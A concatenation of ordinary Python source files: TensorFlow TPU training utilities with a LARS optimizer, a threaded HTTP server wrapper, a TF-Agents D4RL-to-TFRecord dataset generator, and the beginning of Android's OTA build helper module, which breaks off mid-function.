r"""Common utils."""
import os
import re
import threading
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
def get_worker_name(worker_id):
"""Returns `/job:tpu_worker/task:{worker_id}`."""
return f'/job:tpu_worker/task:{worker_id}'
def get_device_name(worker_id, core_id):
"""Returns `/job:tpu_worker/task:{worker_id}/device:tpu:{core_id}`."""
return f'/job:tpu_worker/task:{worker_id}/device:TPU:{core_id}'
def count_params():
"""Count model params."""
num_params = sum([np.prod([d.value for d in w.shape])
for w in tf.trainable_variables()
if 'teacher' not in w.name.lower()])
return num_params
def strip_var_name(var_name):
"""Strips variable name of sub-strings blocking variable name matching.
Removes sub-strings that should be ignored when matching checkpointed variable
names to variable names in the training graph, namely:
- trailing colon + number, e.g. "W:0" --> "W"
- partitioning info., e.g. "/a/part_12/b" --> "a/b".
(Note that checkpointed variables do not have partitioning info in their name,
while model variables do).
Args:
var_name: str, variable name.
Returns:
stripped variable name.
"""
# Strip trailing number, e.g. convert "lstm/W_0:0" to "lstm/W_0".
var_name = re.sub(r':\d+$', '', var_name)
# Strip partitioning info, e.g. convert "W_0/part_3/Adagrad" to "W_0/Adagrad".
var_name = re.sub(r'/part_\d+', '', var_name)
return var_name
def get_saver(max_to_keep=1, restore_ema=False):
"""Constructs a `Saver`."""
var_list = {}
if restore_ema:
logging.info('Restore EMA values')
for v in tf.global_variables():
if v.name.startswith('ema'):
logging.fatal(f'wrong ema var name `{v.name}`')
if 'global_step' in v.name:
var_list['global_step'] = v
else:
var_list['ema/' + strip_var_name(v.name)] = v
else:
for v in tf.global_variables():
var_list[strip_var_name(v.name)] = v
saver = tf.train.Saver(var_list,
max_to_keep=max_to_keep,
save_relative_paths=True)
return saver
class AsyncCheckpoint(object):
"""Saves checkpoint using a separated thread."""
def __init__(self, saver, ckpt_dir, max_to_keep=None):
self._saver = saver
self._ckpt_dir = ckpt_dir
self._max_to_keep = max_to_keep
self._thread = None
self.latest_checkpoint = None
def join(self):
if self._thread is not None:
self._thread.join()
def save(self, sess, step):
"""Docs."""
def _save_fn():
"""Run the saver process."""
raw_sess = sess if isinstance(sess, tf.Session) else sess.raw_session()
ckpt_path = self._saver.save(
raw_sess,
save_path=os.path.join(self._ckpt_dir, 'ckpt'),
global_step=step,
write_meta_graph=False,
write_state=False)
self.latest_checkpoint = ckpt_path[len(self._ckpt_dir) + 1:]
logging.info(f'Saved checkpoint `{ckpt_path}`')
all_checkpoints = get_all_checkpoints(self._ckpt_dir)
assert all_checkpoints is not None
new_ckpt_content = [f'model_checkpoint_path: "{all_checkpoints[-1]}"']
if (self._max_to_keep is not None and
self._max_to_keep < len(all_checkpoints)):
pattern = all_checkpoints[0] + '*'
tf.io.gfile.BulkDelete(tf.io.gfile.Glob(pattern))
# pylint: disable=invalid-unary-operand-type
all_checkpoints = all_checkpoints[-self._max_to_keep:]
# pylint: enable=invalid-unary-operand-type
for ckpt_name in all_checkpoints:
new_ckpt_content.append(f'all_model_checkpoint_paths: "{ckpt_name}"')
checkpoint_file = os.path.join(self._ckpt_dir, 'checkpoint')
with tf.io.gfile.GFile(checkpoint_file, 'w') as fout:
fout.write('\n'.join(new_ckpt_content))
if self._thread is not None:
self._thread.join(timeout=0.1)
if self._thread.is_alive():
logging.info('Saver thread still in progress, skipping checkpoint.')
return
self._thread = threading.Thread(target=_save_fn)
self._thread.start()
def should_log(params):
"""Returns a Boolean `tf.Tensor` dictating whether we should log values."""
global_step = tf.train.get_or_create_global_step()
first_run = tf.equal(global_step, 1)
log_every = tf.equal(tf.floormod(global_step, params.log_every), 0)
return tf.logical_or(first_run, log_every)
def get_all_checkpoints(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
if not tf.io.gfile.IsDirectory(ckpt_dir):
return []
pattern = ckpt_dir + '/ckpt-*'
s = len(ckpt_dir) + len('/ckpt-')
checkpoints = [int(f.split('.')[0][s:]) for f in tf.io.gfile.Glob(pattern)]
checkpoints = [os.path.join(ckpt_dir, 'ckpt-{0}'.format(v))
for v in sorted(set(checkpoints))]
return checkpoints
def get_latest_checkpoint(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
all_checkpoints = get_all_checkpoints(ckpt_dir)
all_checkpoints = [ckpt for ckpt in all_checkpoints if 'temp' not in ckpt]
if all_checkpoints:
return all_checkpoints[-1]
else:
return None
def get_outfeed_ops(params, signature):
"""Create TPU outfeed ops."""
outfeed_dtypes, outfeed_shapes = [], []
for dtype, shape in signature.values():
outfeed_dtypes.append(dtype)
outfeed_shapes.append(shape)
outfeed_ops = []
outfeed_graph = tf.Graph()
dev_assign = params.device_assignment
host_to_tpus = {}
for replica_id in range(params.num_replicas):
host_device = dev_assign.host_device(replica=replica_id, logical_core=0)
tpu_ordinal = dev_assign.tpu_ordinal(replica=replica_id, logical_core=0)
if host_device not in host_to_tpus:
host_to_tpus[host_device] = [tpu_ordinal]
else:
assert tpu_ordinal not in host_to_tpus[host_device]
host_to_tpus[host_device].append(tpu_ordinal)
with outfeed_graph.as_default():
for host, tpus in host_to_tpus.items():
with tf.device(host):
for device_ordinal in tpus:
device_outfeed = tf.raw_ops.OutfeedDequeueTuple(
dtypes=outfeed_dtypes,
shapes=outfeed_shapes,
device_ordinal=device_ordinal)
outfeed_ops.append(device_outfeed)
return outfeed_ops, outfeed_graph
class InfeedThread(object):
"""InfeedTread wrapper."""
def __init__(self, params, infeed_ops, infeed_graphs, name='infeed_thread'):
if infeed_graphs is not None:
assert isinstance(infeed_graphs, list)
assert len(infeed_graphs) == len(infeed_ops)
self.infeed_ops = infeed_ops
self.infeed_graphs = infeed_graphs
self.sessions = []
for g in infeed_graphs:
with g.as_default():
sess = tf.Session(target=params.master, graph=g)
self.sessions.append(sess)
self.name = name
self._threads = []
def stop(self):
self.join()
for sess in self.sessions:
sess.close()
def join(self):
for thread in self._threads:
if thread is not None:
thread.join(timeout=0.1)
del thread
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
def _infeed_fn(sess, infeed_op, infeed_graph):
"""Run the infeed process."""
with infeed_graph.as_default():
sess.run(infeed_op)
for sess, op, g in zip(self.sessions, self.infeed_ops, self.infeed_graphs):
thread = threading.Thread(target=_infeed_fn, args=(sess, op, g))
thread.daemon = True
thread.start()
self._threads.append(thread)
class OutfeedThread(object):
"""OutfeedThread wrapper."""
def __init__(self, params, outfeed_ops, outfeed_graph, outfeed_signature,
name='outfeed_thread'):
self.params = params
self.outfeed_ops = outfeed_ops
self.outfeed_graph = outfeed_graph
self.outfeed_signature = outfeed_signature
with outfeed_graph.as_default():
self.session = tf.Session(target=params.master, graph=outfeed_graph)
self.name = name
self._thread = None
def join(self):
if self._thread is not None:
self._thread.join(timeout=0.1)
self._thread = None
self.session.close()
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
if self._thread is not None:
return
params = self.params
outfeed_signature = self.outfeed_signature
def _outfeed_fn():
"""Read from `outfeed_dequeue` and write `Summary`."""
train_logdir = os.path.join(params.output_dir, 'logs', 'train')
summary_writer = tf.summary.FileWriter(train_logdir)
summary_tags = list(outfeed_signature.keys())
while True:
outfeeds = self.session.run(self.outfeed_ops)
outfeeds = np.array(outfeeds).reshape([params.num_replicas, -1])
outfeeds = np.sum(outfeeds, axis=0).tolist()
summary_values = []
for tag, value in zip(summary_tags, outfeeds):
if tag == 'global_step':
value /= params.num_replicas
step = value
else:
summary_values.append(tf.Summary.Value(tag=tag, simple_value=value))
summary_writer.add_summary(tf.Summary(value=summary_values), step)
summary_writer.flush()
if step >= params.num_train_steps:
summary_writer.close()
break
self._thread = threading.Thread(target=_outfeed_fn)
self._thread.daemon = True
self._thread.start()
def setup_ema(params, name_scope=None):
"""Create exponential moving average for all variables under `name_scope`."""
logging.info(f'ema_decay with rate {params.ema_decay}')
all_vars = tf.global_variables()
ema_ops = []
step = tf.cast(tf.train.get_or_create_global_step() - params.ema_start,
tf.float32)
decay = 1. - tf.minimum(params.ema_decay, (step+1.) / (step+10.))
decay = tf.cond(tf.train.get_or_create_global_step() < params.ema_start,
lambda: tf.constant(1, tf.float32), lambda: decay)
def should_skip(v):
key_words = ['momentum', 'rms', 'global_step', 'debug', 'adam', 'lars']
conditions = [k in v.name.lower() for k in key_words]
if name_scope is not None:
conditions += [not v.name.lower().startswith(name_scope)]
return any(conditions)
def get_init(v_name):
key_words = ['variance', 'beta']
if any([k in v_name for k in key_words]):
return tf.initializers.ones()
return tf.initializers.zeros()
with tf.variable_scope('ema'):
for v in all_vars:
if not should_skip(v):
v_name = strip_var_name(v.name)
with tf.device(v.device):
ema_var = tf.get_variable(
name=v_name,
shape=v.shape.as_list(),
initializer=get_init(v_name),
trainable=False)
ema_op = tf.assign_sub(ema_var, decay * (ema_var-v), use_locking=True)
ema_ops.append(ema_op)
ema_op = tf.group(*ema_ops)
return ema_op
def get_session(params, isolate_session_state=True):
"""Builds and returns a `tf.Session`."""
config = tf.ConfigProto(
isolate_session_state=isolate_session_state,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
return tf.Session(target=params.master, config=config)
def get_learning_rate(params, initial_lr=None, num_warmup_steps=None,
num_wait_steps=None):
"""Build learning rate."""
global_step = tf.train.get_or_create_global_step()
if initial_lr is None:
initial_lr = params.lr
initial_lr = initial_lr * params.train_batch_size / 256.
if num_warmup_steps is None:
num_warmup_steps = params.num_warmup_steps
if num_wait_steps is not None:
global_step = global_step - num_wait_steps
if params.lr_decay_type == 'constant':
lr = tf.constant(initial_lr, dtype=tf.float32)
elif params.lr_decay_type == 'exponential':
lr = tf.train.exponential_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_decay_steps,
decay_rate=params.lr_decay_rate,
staircase=True)
elif params.lr_decay_type == 'cosine':
if num_wait_steps is None:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps,
alpha=0.0)
else:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps-num_wait_steps,
alpha=0.0)
else:
raise ValueError(f'Unknown lr_decay_type `{params.lr_decay_type}`')
r = (tf.cast(global_step+1, tf.float32) /
tf.cast(num_warmup_steps, tf.float32))
warmup_lr = initial_lr * r
lr = tf.cond(global_step < num_warmup_steps, lambda: warmup_lr, lambda: lr)
if num_wait_steps is not None:
lr = tf.cond(global_step < 0,
lambda: tf.constant(0., tf.float32), lambda: lr)
return lr
def get_optimizer(params, learning_rate=None):
"""Build optimizer."""
if learning_rate is None:
learning_rate = get_learning_rate(params)
if params.optim_type.lower() == 'sgd':
logging.info('Use SGD')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate,
use_locking=True)
elif params.optim_type.lower() == 'momentum':
logging.info('Use Momentum')
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
momentum=0.9,
use_nesterov=True,
use_locking=True)
elif params.optim_type.lower() == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate,
decay=params.rmsprop_rho,
momentum=params.rmsprop_momentum,
epsilon=params.rmsprop_epsilon,
use_locking=True)
elif params.optim_type.lower() == 'lars':
class LARSOptimizer(tf.train.Optimizer):
"""Layer-wise Adaptive Rate Scaling for large batch training.
Introduced by "Large Batch Training of Convolutional Networks" by Y. You,
I. Gitman, and B. Ginsburg. (https://arxiv.org/abs/1708.03888)
Implements the LARS learning rate scheme presented in the paper above.
This optimizer is useful when scaling the batch size to up to 32K without
significant performance degradation. It is recommended to use the
optimizer in conjunction with:
- Gradual learning rate warm-up
- Linear learning rate scaling
- Poly rule learning rate decay
Note, LARS scaling is currently only enabled for dense tensors. Sparse
tensors use the default momentum optimizer.
"""
def __init__(
self,
learning_rate,
momentum=0.9,
weight_decay=0.0001,
# The LARS coefficient is a hyperparameter
eeta=0.001,
epsilon=0.0,
name='LARSOptimizer',
# Enable skipping variables from LARS scaling.
# TODO(sameerkm): Enable a direct mechanism to pass a
# subset of variables to the optimizer.
skip_list=None,
use_nesterov=False):
"""Construct a new LARS Optimizer.
Args:
learning_rate: A `Tensor` or floating point value.
momentum: A floating point value. Momentum hyperparameter.
weight_decay: A floating point value. Weight decay hyperparameter.
eeta: LARS coefficient as used in the paper. Dfault set to LARS
coefficient from the paper. (eeta / weight_decay) determines the
highest scaling factor in LARS.
epsilon: Optional epsilon parameter to be set in models that have very
small gradients. Default set to 0.0.
name: Optional name prefix for variables and ops created.
skip_list: List of strings to enable skipping variables from scaling.
If any of the strings in skip_list is a subset of var.name, variable
'var' is skipped from LARS scaling. For a typical classification
model with batch normalization, the skip_list is
['batch_normalization', 'bias']
use_nesterov: when set to True, nesterov momentum will be enabled
Raises:
ValueError: If a hyperparameter is set to a non-sensical value.
"""
if momentum < 0.0:
raise ValueError(f'momentum should be positive: {momentum}')
if weight_decay < 0.0:
raise ValueError(f'weight_decay should be positive: {weight_decay}')
super(LARSOptimizer, self).__init__(use_locking=False, name=name)
self._learning_rate = learning_rate
self._momentum = momentum
self._weight_decay = weight_decay
self._eeta = eeta
self._epsilon = epsilon
self._name = name
self._skip_list = skip_list
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, 'momentum', self._name)
def compute_lr(self, grad, var):
scaled_lr = self._learning_rate
if self._skip_list is None or not any(v in var.name
for v in self._skip_list):
w_norm = tf.norm(var, ord=2)
g_norm = tf.norm(grad, ord=2)
trust_ratio = tf.where(
tf.math.greater(w_norm, 0),
tf.where(
tf.math.greater(g_norm, 0),
(self._eeta * w_norm / (
g_norm + self._weight_decay * w_norm + self._epsilon)),
1.0),
1.0)
scaled_lr = self._learning_rate * trust_ratio
# Add the weight regularization gradient
grad = grad + self._weight_decay * var
return scaled_lr, grad
def _apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ApplyMomentum(
var,
mom,
tf.cast(1.0, var.dtype.base_dtype),
grad * scaled_lr,
self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
def _resource_apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceApplyMomentum(
var=var.handle,
accum=mom.handle,
lr=tf.cast(1.0, var.dtype.base_dtype),
grad=grad * scaled_lr,
momentum=self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
# Fallback to momentum optimizer for sparse tensors
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.SparseApplyMomentum(
var,
mom,
tf.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values,
grad.indices,
tf.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceSparseApplyMomentum(
var.handle,
mom.handle,
tf.cast(self._learning_rate_tensor, grad.dtype),
grad,
indices,
tf.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = tf.convert_to_tensor(
learning_rate, name='learning_rate')
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = tf.convert_to_tensor(momentum, name='momentum')
optimizer = LARSOptimizer(
learning_rate=learning_rate,
weight_decay=params.weight_decay,
skip_list=['batch_norm', 'batchnorm', 'gamma', 'beta', 'bias'],
use_nesterov=True)
else:
raise ValueError(f'Unknown optim_type `{params.optim_type}`')
return learning_rate, optimizer
def get_l2_loss(excluded_keywords=None):
"""Traverse `tf.trainable_variables` compute L2 reg. Ignore `batch_norm`."""
def _is_excluded(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn',
'layernorm', 'layer_norm']
if excluded_keywords is not None:
keywords += excluded_keywords
return any([k in v.name.lower() for k in keywords])
l2_losses = [tf.nn.l2_loss(v) for v in tf.trainable_variables()
if not _is_excluded(v)]
return tf.add_n(l2_losses)
|
HTTPServer.py
|
from BaseHTTPServer import HTTPServer as GrandparentServer, BaseHTTPRequestHandler as GrandparentHandler
import socket
from time import sleep
from Settings import PORT
from utils import *
from rorn.HTTPServer import HTTPServer as ParentServer
from rorn.Lock import getLock, getCounter
class ServerError(Exception): pass
class HTTPServer(ParentServer):
def __init__(self, *args, **kw):
super(HTTPServer, self).__init__(*args, **kw)
self.totalRequests = 0
self.currentRequests = getCounter('requests', unique = True)
def process_request(self, request, client_address):
# The #reqcheck lock is used by some threads to block requests
# Grab it to make sure none of those threads have it, and then add this request
# to 'currentRequests' to prevent those threads from starting
with getLock('#reqcheck'):
self.totalRequests += 1
self.currentRequests.inc()
return super(HTTPServer, self).process_request(request, client_address)
# When this returns, there will be no more than 'expected' processing requests and
# it will have acquired #reqcheck to keep it that way (it also returns the lock instance)
# The caller *needs* to release #reqcheck when finished
def block_requests(self, expected = 0):
from Log import console
lock = getLock('#reqcheck')
lock.acquire()
self.currentRequests -= expected
while True:
if self.currentRequests.count == 0:
self.currentRequests += expected
return lock
lock.release()
sleep(.1)
lock.acquire()
def close_request(self, request):
self.currentRequests.dec()
super(HTTPServer, self).close_request(request)
def stop(self):
self.socket.close()
def getTotalRequests(self):
return self.totalRequests
def anyCurrentRequests(self):
return self.currentRequests.any()
class LoadingServer(GrandparentServer, object):
class Handler(GrandparentHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
if self.path == '/api/uptime':
self.wfile.write("-1\n")
else:
self.wfile.write(open('static/loading.html').read())
def do_POST(self):
self.send_response(302)
self.send_header('Location', '/')
self.end_headers()
def log_message(self, fmt, *args):
pass
def __init__(self):
super(LoadingServer, self).__init__(('', PORT), LoadingServer.Handler)
self.thread = None
def serve_bg(self):
self.thread = Thread(target = self.serve_wrap)
self.thread.daemon = True
self.thread.start()
def serve_wrap(self):
try:
self.serve_forever()
except socket.error:
pass
def stop(self):
self.socket.close()
if self.thread:
self.thread.join()
singleton = None
def server():
global singleton
if not singleton:
try:
from HTTPHandler import HTTPHandler
singleton = HTTPServer(('', PORT), HTTPHandler)
except socket.error, (errno, msg):
raise ServerError("Unable to open port %d: %s" % (PORT, msg))
return singleton
|
dataset_generator.py
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate D4RL TFRecord dataset that is compatible with TF-Agents."""
# Lint as: python3
import functools
import os
from absl import app
from absl import flags
from absl import logging
import d4rl # pylint: disable=unused-import
import gym
from tf_agents.experimental.examples.cql_sac.kumar20.dataset import dataset_utils
from tf_agents.experimental.examples.cql_sac.kumar20.dataset import file_utils
from tf_agents.system import system_multiprocessing as multiprocessing
# Using XM. # pylint: disable=unused-import
flags.DEFINE_string('root_dir', '/tmp/dataset/', 'Output dataset directory.')
flags.DEFINE_string(
'env_name', 'hopper-medium-v0', 'Env name. '
'Should match one of keys in d4rl.infos.DATASET_URLS')
flags.DEFINE_integer('replicas', None,
'Number of parallel replicas generating evaluations.')
flags.DEFINE_integer(
'replica_id', None,
'Replica id. If not None, only generate for this replica slice.')
flags.DEFINE_bool(
'use_trajectories', False,
'Whether to save samples as trajectories. If False, save as transitions.')
flags.DEFINE_bool(
'exclude_timeouts', False, 'Whether to exclude the final episode step '
'if it from a timeout instead of a terminal.')
FLAGS = flags.FLAGS
def main(_):
logging.set_verbosity(logging.INFO)
d4rl_env = gym.make(FLAGS.env_name)
d4rl_dataset = d4rl_env.get_dataset()
root_dir = os.path.join(FLAGS.root_dir, FLAGS.env_name)
dataset_dict = dataset_utils.create_episode_dataset(d4rl_dataset,
FLAGS.exclude_timeouts)
num_episodes = len(dataset_dict['episode_start_index'])
logging.info('Found %d episodes, %s total steps.', num_episodes,
len(dataset_dict['states']))
collect_data_spec = dataset_utils.create_collect_data_spec(
dataset_dict, use_trajectories=FLAGS.use_trajectories)
logging.info('Collect data spec %s', collect_data_spec)
num_replicas = FLAGS.replicas or 1
interval_size = num_episodes // num_replicas + 1
# If FLAGS.replica_id is set, only run that section of the dataset.
# This is useful if distributing the replicas on Borg.
if FLAGS.replica_id is not None:
file_name = '%s_%d.tfrecord' % (FLAGS.env_name, FLAGS.replica_id)
start_index = FLAGS.replica_id * interval_size
end_index = min((FLAGS.replica_id + 1) * interval_size, num_episodes)
file_utils.write_samples_to_tfrecord(
dataset_dict=dataset_dict,
collect_data_spec=collect_data_spec,
dataset_path=os.path.join(root_dir, file_name),
start_episode=start_index,
end_episode=end_index,
use_trajectories=FLAGS.use_trajectories)
else:
# Otherwise, parallelize with tf_agents.system.multiprocessing.
jobs = []
context = multiprocessing.get_context()
for i in range(num_replicas):
if num_replicas == 1:
file_name = '%s.tfrecord' % FLAGS.env_name
else:
file_name = '%s_%d.tfrecord' % (FLAGS.env_name, i)
dataset_path = os.path.join(root_dir, file_name)
start_index = i * interval_size
end_index = min((i + 1) * interval_size, num_episodes)
kwargs = dict(
dataset_dict=dataset_dict,
collect_data_spec=collect_data_spec,
dataset_path=dataset_path,
start_episode=start_index,
end_episode=end_index,
use_trajectories=FLAGS.use_trajectories)
job = context.Process(
target=file_utils.write_samples_to_tfrecord, kwargs=kwargs)
job.start()
jobs.append(job)
for job in jobs:
job.join()
if __name__ == '__main__':
multiprocessing.handle_main(functools.partial(app.run, main))
|
common.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
import blockimgdiff
from hashlib import sha1 as sha1
class Options(object):
def __init__(self):
platform_search_path = {
"linux2": "out/host/linux-x86",
"darwin": "out/host/darwin-x86",
}
self.search_path = platform_search_path.get(sys.platform, None)
self.signapk_path = "framework/signapk.jar" # Relative to search_path
self.signapk_shared_library_path = "lib64" # Relative to search_path
self.extra_signapk_args = []
self.java_path = "java" # Use the one on the path by default.
self.java_args = ["-Xmx2048m"] # The default JVM args.
self.public_key_suffix = ".x509.pem"
self.private_key_suffix = ".pk8"
# use otatools built boot_signer by default
self.boot_signer_path = "boot_signer"
self.boot_signer_args = []
self.verity_signer_path = None
self.verity_signer_args = []
self.verbose = False
self.tempfiles = []
self.device_specific = None
self.extras = {}
self.info_dict = None
self.source_info_dict = None
self.target_info_dict = None
self.worker_threads = None
# Stash size cannot exceed cache_size * threshold.
self.cache_size = None
self.stash_threshold = 0.8
OPTIONS = Options()
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ErrorCode(object):
"""Define error_codes for failures that happen during the actual
update package installation.
Error codes 0-999 are reserved for failures before the package
installation (i.e. low battery, package verification failure).
Detailed code in 'bootable/recovery/error_code.h' """
SYSTEM_VERIFICATION_FAILURE = 1000
SYSTEM_UPDATE_FAILURE = 1001
SYSTEM_UNEXPECTED_CONTENTS = 1002
SYSTEM_NONZERO_CONTENTS = 1003
SYSTEM_RECOVER_FAILURE = 1004
VENDOR_VERIFICATION_FAILURE = 2000
VENDOR_UPDATE_FAILURE = 2001
VENDOR_UNEXPECTED_CONTENTS = 2002
VENDOR_NONZERO_CONTENTS = 2003
VENDOR_RECOVER_FAILURE = 2004
OEM_PROP_MISMATCH = 3000
FINGERPRINT_MISMATCH = 3001
THUMBPRINT_MISMATCH = 3002
OLDER_BUILD = 3003
DEVICE_MISMATCH = 3004
BAD_PATCH_FILE = 3005
INSUFFICIENT_CACHE_SPACE = 3006
TUNE_PARTITION_FAILURE = 3007
APPLY_PATCH_FAILURE = 3008
class ExternalError(RuntimeError):
pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print(" running: ", " ".join(args))
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(input_file, input_dir=None):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
def read_helper(fn):
if isinstance(input_file, zipfile.ZipFile):
return input_file.read(fn)
else:
path = os.path.join(input_file, *fn.split("/"))
try:
with open(path) as f:
return f.read()
except IOError as e:
if e.errno == errno.ENOENT:
raise KeyError(fn)
d = {}
try:
d = LoadDictionaryFromLines(read_helper("META/misc_info.txt").split("\n"))
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = read_helper(
"META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = read_helper(
"META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = read_helper("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
# A few properties are stored as links to the files in the out/ directory.
# It works fine with the build system. However, they are no longer available
# when (re)generating from target_files zip. If input_dir is not None, we
# are doing repacking. Redirect those properties to the actual files in the
# unzipped directory.
if input_dir is not None:
# We carry a copy of file_contexts.bin under META/. If not available,
# search BOOT/RAMDISK/. Note that sometimes we may need a different file
# to build images than the one running on device, such as when enabling
# system_root_image. In that case, we must have the one for image
# generation copied to META/.
fc_basename = os.path.basename(d.get("selinux_fc", "file_contexts"))
fc_config = os.path.join(input_dir, "META", fc_basename)
if d.get("system_root_image") == "true":
assert os.path.exists(fc_config)
if not os.path.exists(fc_config):
fc_config = os.path.join(input_dir, "BOOT", "RAMDISK", fc_basename)
if not os.path.exists(fc_config):
fc_config = None
if fc_config:
d["selinux_fc"] = fc_config
# Similarly we need to redirect "ramdisk_dir" and "ramdisk_fs_config".
if d.get("system_root_image") == "true":
d["ramdisk_dir"] = os.path.join(input_dir, "ROOT")
d["ramdisk_fs_config"] = os.path.join(
input_dir, "META", "root_filesystem_config.txt")
# Redirect {system,vendor}_base_fs_file.
if "system_base_fs_file" in d:
basename = os.path.basename(d["system_base_fs_file"])
system_base_fs_file = os.path.join(input_dir, "META", basename)
if os.path.exists(system_base_fs_file):
d["system_base_fs_file"] = system_base_fs_file
else:
print("Warning: failed to find system base fs file: %s" % (
system_base_fs_file,))
del d["system_base_fs_file"]
if "vendor_base_fs_file" in d:
basename = os.path.basename(d["vendor_base_fs_file"])
vendor_base_fs_file = os.path.join(input_dir, "META", basename)
if os.path.exists(vendor_base_fs_file):
d["vendor_base_fs_file"] = vendor_base_fs_file
else:
print("Warning: failed to find vendor base fs file: %s" % (
vendor_base_fs_file,))
del d["vendor_base_fs_file"]
try:
data = read_helper("META/imagesizes.txt")
for line in data.split("\n"):
if not line:
continue
name, value = line.split(" ", 1)
if not value:
continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("vendor_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
if d.get("no_recovery", False) == "true":
d["fstab"] = None
else:
d["fstab"] = LoadRecoveryFSTab(read_helper, d["fstab_version"],
d.get("system_root_image", False))
d["build.prop"] = LoadBuildProp(read_helper)
return d
def LoadBuildProp(read_helper):
try:
data = read_helper("SYSTEM/build.prop")
except KeyError:
print("Warning: could not find SYSTEM/build.prop in %s" % zip)
data = ""
return LoadDictionaryFromLines(data.split("\n"))
def LoadDictionaryFromLines(lines):
d = {}
for line in lines:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" in line:
name, value = line.split("=", 1)
d[name] = value
return d
def LoadRecoveryFSTab(read_helper, fstab_version, system_root_image=False):
class Partition(object):
def __init__(self, mount_point, fs_type, device, length, device2, context):
self.mount_point = mount_point
self.fs_type = fs_type
self.device = device
self.length = length
self.device2 = device2
self.context = context
try:
data = read_helper("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print("Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab")
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
pieces = line.split()
